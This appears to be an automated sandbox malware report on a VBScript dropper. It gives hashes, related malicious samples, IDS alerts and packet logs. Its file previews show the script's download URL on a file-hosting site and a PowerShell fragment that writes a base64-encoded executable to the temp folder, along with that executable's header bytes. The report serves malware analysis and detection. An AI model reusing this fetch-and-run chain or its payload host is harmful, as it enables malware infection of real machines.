                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: z68scancopy.vbs

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      07:37:47API Interceptor5x Sleep call for process: powershell.exe modified
                                                      09:01:50API Interceptor3x Sleep call for process: RegAsm.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      108.181.20.35Document.pdf.lnkGet hashmaliciousUnknownBrowse
                                                      • files.catbox.moe/p1yr9i.pdf
                                                      SecuriteInfo.com.HEUR.Trojan.OLE2.Agent.gen.26943.12401.msiGet hashmaliciousLummaC StealerBrowse
                                                      • files.catbox.moe/nzct1p

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      files.catbox.moe2zirzlMVqX.batGet hashmaliciousXmrigBrowse
                                                      • 108.181.20.35
                                                      QwLii5vouB.exeGet hashmaliciousUnknownBrowse
                                                      • 108.181.20.35
                                                      PO Huaruicarbon 98718.htmlGet hashmaliciousCorporateDataTheft, HTMLPhisherBrowse
                                                      • 108.181.20.35
                                                      5QnwxSJVyX.docGet hashmaliciousUnknownBrowse
                                                      • 108.181.20.35
                                                      file.exeGet hashmaliciousFormBookBrowse
                                                      • 108.181.20.35
                                                      file.exeGet hashmaliciousFormBookBrowse
                                                      • 108.181.20.35
                                                      https://drive.google.com/uc?export=download&id=11w_oRLtDWJl2z1SKN0zkobTHd_Ix44t9Get hashmaliciousUnknownBrowse
                                                      • 108.181.20.35
                                                      LETA_pdf.vbsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                      • 108.181.20.35
                                                      file.exeGet hashmaliciousFormBookBrowse
                                                      • 108.181.20.35
                                                      https://files.catbox.moe/iz3lne.zipGet hashmaliciousUnknownBrowse
                                                      • 108.181.20.35

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      ASN852CAloligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                      • 207.34.214.194
                                                      loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                      • 142.101.249.54
                                                      sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 23.17.23.190
                                                      1.elfGet hashmaliciousUnknownBrowse
                                                      • 142.169.19.83
                                                      arm4.elfGet hashmaliciousMiraiBrowse
                                                      • 199.175.20.28
                                                      i686.elfGet hashmaliciousMiraiBrowse
                                                      • 172.218.65.147
                                                      spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                      • 207.6.251.7
                                                      arm5.elfGet hashmaliciousMiraiBrowse
                                                      • 75.155.196.100
                                                      x86.elfGet hashmaliciousMiraiBrowse
                                                      • 207.81.69.113
                                                      jignesh.exeGet hashmaliciousQuasarBrowse
                                                      • 108.181.61.49

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      37f463bf4616ecd445d4a1937da06e19oiBxz37xUo.dllGet hashmaliciousUnknownBrowse
                                                      • 108.181.20.35
                                                      T2dvU8f2xg.exeGet hashmaliciousUnknownBrowse
                                                      • 108.181.20.35
                                                      oiBxz37xUo.dllGet hashmaliciousUnknownBrowse
                                                      • 108.181.20.35
                                                      7nJ9Jo78Vq.dllGet hashmaliciousUnknownBrowse
                                                      • 108.181.20.35
                                                      7nJ9Jo78Vq.dllGet hashmaliciousUnknownBrowse
                                                      • 108.181.20.35
                                                      3zhEXB7iUp.dllGet hashmaliciousUnknownBrowse
                                                      • 108.181.20.35
                                                      i4VmSW2D4u.dllGet hashmaliciousUnknownBrowse
                                                      • 108.181.20.35
                                                      3zhEXB7iUp.dllGet hashmaliciousUnknownBrowse
                                                      • 108.181.20.35
                                                      i4VmSW2D4u.dllGet hashmaliciousUnknownBrowse
                                                      • 108.181.20.35
                                                      noll.exeGet hashmaliciousStealc, VidarBrowse
                                                      • 108.181.20.35

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Temp\dddddd.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\wscript.exe
                                                      File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1035728
                                                      Entropy (8bit):4.368229562380478
                                                      Encrypted:false
                                                      SSDEEP:24576:7IMMjCG9gTl+disoG9j/aN16+O5HZ+NPOnJ680z4MDUBFMUbRK7yubjU:YgTl+3o6/aN1FO5HZ+Nm0800MDU8UbRb
                                                      MD5:BDA29E3B3586AD57E9889CEF65EC3F48
                                                      SHA1:FCF076AC8C3C7E61596E9A738E2732BB9505264D
                                                      SHA-256:9BD8112806E59DB39DE98D38F05F8466E625494AB9AA7E07AC7AC3014CB91B61
                                                      SHA-512:98DE720BFCDFFA461F2A7DCEFF6C73D93C9D739CCE4327318BDC971B91D16B4DA375EFC9B51BF10A75038CA6B0AD8B9167B895C82AC04875AC670C615C0EEF87
                                                      Malicious:true
                                                      Reputation:low
                                                      Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAODzYWcAAAAAAAAAAOAAAgELAQsAANALAAAIAAAAAAAAju4LAAAgAAAAAAwAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAABADAAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAADjuCwBTAAAAAAAMAOAEAAAAAAAAAAAAAAAAAAAAAAAAACAMAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAlM4LAAAgAAAA0AsAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAOAEAAAAAAwAAAYAAADSCwAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAACAMAAACAAAA2AsAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABw7gsAAAAAAEgAAAACAAUALCYAAAzICwADAAAADAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4CKAUAAAoqEzADADIAAAABAAARcgEAAHAoBgAACgpyQwAAcCgGAAAKC3JdAABwDAgGBygNAAAGbwcAAAoNEgMoCAAACioAABswAwBhAAAAAgAAE

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                      File Type:CSV text
                                                      Category:dropped
                                                      Size (bytes):226
                                                      Entropy (8bit):5.360398796477698
                                                      Encrypted:false
                                                      SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                      MD5:3A8957C6382192B71471BD14359D0B12
                                                      SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                      SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                      SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\q8ynky[1].ps1

                                                      Download File
                                                      Process:C:\Windows\System32\wscript.exe
                                                      File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1035728
                                                      Entropy (8bit):4.368229562380478
                                                      Encrypted:false
                                                      SSDEEP:24576:7IMMjCG9gTl+disoG9j/aN16+O5HZ+NPOnJ680z4MDUBFMUbRK7yubjU:YgTl+3o6/aN1FO5HZ+Nm0800MDU8UbRb
                                                      MD5:BDA29E3B3586AD57E9889CEF65EC3F48
                                                      SHA1:FCF076AC8C3C7E61596E9A738E2732BB9505264D
                                                      SHA-256:9BD8112806E59DB39DE98D38F05F8466E625494AB9AA7E07AC7AC3014CB91B61
                                                      SHA-512:98DE720BFCDFFA461F2A7DCEFF6C73D93C9D739CCE4327318BDC971B91D16B4DA375EFC9B51BF10A75038CA6B0AD8B9167B895C82AC04875AC670C615C0EEF87
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAODzYWcAAAAAAAAAAOAAAgELAQsAANALAAAIAAAAAAAAju4LAAAgAAAAAAwAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAABADAAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAADjuCwBTAAAAAAAMAOAEAAAAAAAAAAAAAAAAAAAAAAAAACAMAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAlM4LAAAgAAAA0AsAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAOAEAAAAAAwAAAYAAADSCwAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAACAMAAACAAAA2AsAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABw7gsAAAAAAEgAAAACAAUALCYAAAzICwADAAAADAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4CKAUAAAoqEzADADIAAAABAAARcgEAAHAoBgAACgpyQwAAcCgGAAAKC3JdAABwDAgGBygNAAAGbwcAAAoNEgMoCAAACioAABswAwBhAAAAAgAAE

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1628158735648508
                                                      Encrypted:false
                                                      SSDEEP:3:NlllulLhwlz:NllUO
                                                      MD5:F442CD24937ABD508058EA44FD91378E
                                                      SHA1:FDE63CECA441AA1C5C9C401498F9032A23B38085
                                                      SHA-256:E2960AF08E2EE7C9C72EEA31DBBFE1B55B9BF84DE2DD7BB7204487E6AF37B8F6
                                                      SHA-512:927E2EEA0BB3FC3D3A0DA7F45644F594CE29F11D90A84B005D723500258DE9E8B3780EB87242F4C62B64B9FEEA1869FC16076FA3AC89EC34E0546CDE1BEF7631
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:@...e................................................@..........

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_em4gxuyp.mhn.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ixiscl4m.aun.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\x.exe

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):776704
                                                      Entropy (8bit):4.04135879191109
                                                      Encrypted:false
                                                      SSDEEP:12288:93GWShw4sBisE6wp1on88qnG0VZ2clLUJvIe3bdXbXokxJhOAPYkdTXC3Kx8fAqv:9pwMuV1A5TnEG
                                                      MD5:68FC317E2CC6A7B69F76B9D8DDEC0C79
                                                      SHA1:5D45C6401E970DED459D103737C8FD7D9EFE379C
                                                      SHA-256:A67C89C39A5F00AA0EB16D600080D78E995D0FECF2E8A12CF55EC4E978596853
                                                      SHA-512:8ABF7F25D28225D8C02E082862B4C090D225571C975DC5DDD8A3A577A5546D51AA65A6E3DCFC07DAD3EB53A18D1F6E8C86C4BF394169E626C1083AF3D2334661
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ag................................. ........@.. .......................@............@.................................8...S............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................p.......H.......,&................................................................(....*.0..2.......r...p(.....rC..p(.....r]..p....(....o.......(....*...0..a..........{.....{.....{....(......,.(....rz..p(.......(..........}.....|.....(.........}.....|....(....*...........66......6.|.....(....*...0..J..........}.......}.......}......(....}.......}......{.........(...+..|....(....*...0...........(........(....*.0............8....(.....(....-.r...ps....z..<(........4X(.....(............

                                                      Static File Info

                                                      General

                                                      File type:ASCII text, with CRLF line terminators
                                                      Entropy (8bit):4.931851297898062
                                                      TrID:
                                                      • Visual Basic Script (13500/0) 100.00%
                                                      File name:z68scancopy.vbs
                                                      File size:2'041 bytes
                                                      MD5:f8d8d9515f5dea0a837e4ada0559cce9
                                                      SHA1:f6b49863b6aa0a17cb0da253d72b3126ca825ffc
                                                      SHA256:6c342244e4efc5514dcbb7fce2bd00ad28531afe1f400257abd4acb8ecfac2d4
                                                      SHA512:747bb5c0e4f62da834949239013566b995280a87ed3d5338d0414f3e137c6af5455e4771b1638912021cdbbabc7e3b0e324820a8c355c97f1d0737ea008b0ee2
                                                      SSDEEP:48:ICNviLaRE/jyJ2yAwJGrn/kJBJk/mLJ5+/q:ICNGryJ3HJGr/kJfk/mLJ5+/q
                                                      TLSH:94415437ED0BD3615C378B0F856EE45DDE00419B75244550BEAC8847BF357E8EAA828D
                                                      File Content Preview:' Constants to avoid magic strings..Const URL = "https://files.catbox.moe/q8ynky.ps1"..Const DownloadPath = "C:\Temp\dddddd.ps1"..Const TEMP_DIR = "C:\Temp"..Const SUCCESS_STATUS = 200....' Secure PowerShell execution policy and command..Const POWERSHELL_

                                                      File Icon

                                                      Icon Hash:68d69b8f86ab9a86

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-12-18T13:37:42.820303+01002827578ETPRO MALWARE Likely Dropper Doc GET to .moe TLD1192.168.2.749701108.181.20.35443TCP
                                                      2024-12-18T13:37:43.056873+01002018856ET MALWARE Windows executable base64 encoded1108.181.20.35443192.168.2.749701TCP

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 18, 2024 13:37:40.141093016 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:40.141120911 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:40.141254902 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:40.210680008 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:40.210702896 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:42.072166920 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:42.072247982 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:42.132997036 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:42.133027077 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:42.133375883 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:42.133435011 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:42.135374069 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:42.179348946 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:42.820282936 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:42.820308924 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:42.820324898 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:42.820425987 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:42.820456982 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:42.820513010 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:42.871517897 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:42.871543884 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:42.871642113 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:42.871668100 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:42.871712923 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.012231112 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.012257099 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.012334108 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.012365103 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.012398005 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.012418032 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.056914091 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.056946039 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.057018042 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.057037115 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.057080984 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.057101011 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.086020947 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.086051941 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.086153030 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.086180925 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.086234093 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.111001015 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.111035109 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.111120939 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.111149073 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.111202955 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.218059063 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.218086958 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.218192101 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.218208075 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.218300104 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.239662886 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.239686012 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.239774942 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.239797115 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.239862919 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.260617018 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.260642052 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.260715961 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.260736942 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.260790110 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.279524088 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.279555082 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.279628992 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.279645920 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.279700041 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.296374083 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.296401024 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.296474934 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.296497107 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.296544075 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.315068007 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.315100908 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.315160990 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.315176964 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.315217972 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.406915903 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.406943083 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.407018900 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.407042027 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.407097101 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.422570944 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.422600985 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.422677040 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.422705889 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.422745943 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.433490992 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.433514118 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.433650970 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.433674097 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.433713913 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.447979927 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.448019028 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.448088884 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.448112011 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.448153019 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.448169947 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.458118916 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.458137989 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.458261967 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.458287001 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.458362103 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.470562935 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.470585108 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.470741987 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.470767021 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.470805883 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.483072042 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.483098030 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.483223915 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.483243942 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.483285904 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.494334936 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.494363070 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.494458914 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.494487047 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.494532108 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.596508980 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.596530914 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.596708059 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.596738100 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.596779108 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.606534958 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.606555939 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.606650114 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.606673002 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.606734037 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.612747908 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.612771988 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.612842083 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.612860918 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.612901926 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.621630907 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.621659040 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.621757030 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.621778965 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.621845961 CET49701443192.168.2.7108.181.20.35
                                                      Dec 18, 2024 13:37:43.630705118 CET44349701108.181.20.35192.168.2.7
                                                      Dec 18, 2024 13:37:43.630738020 CET44349701108.181.20.35192.168.2.7
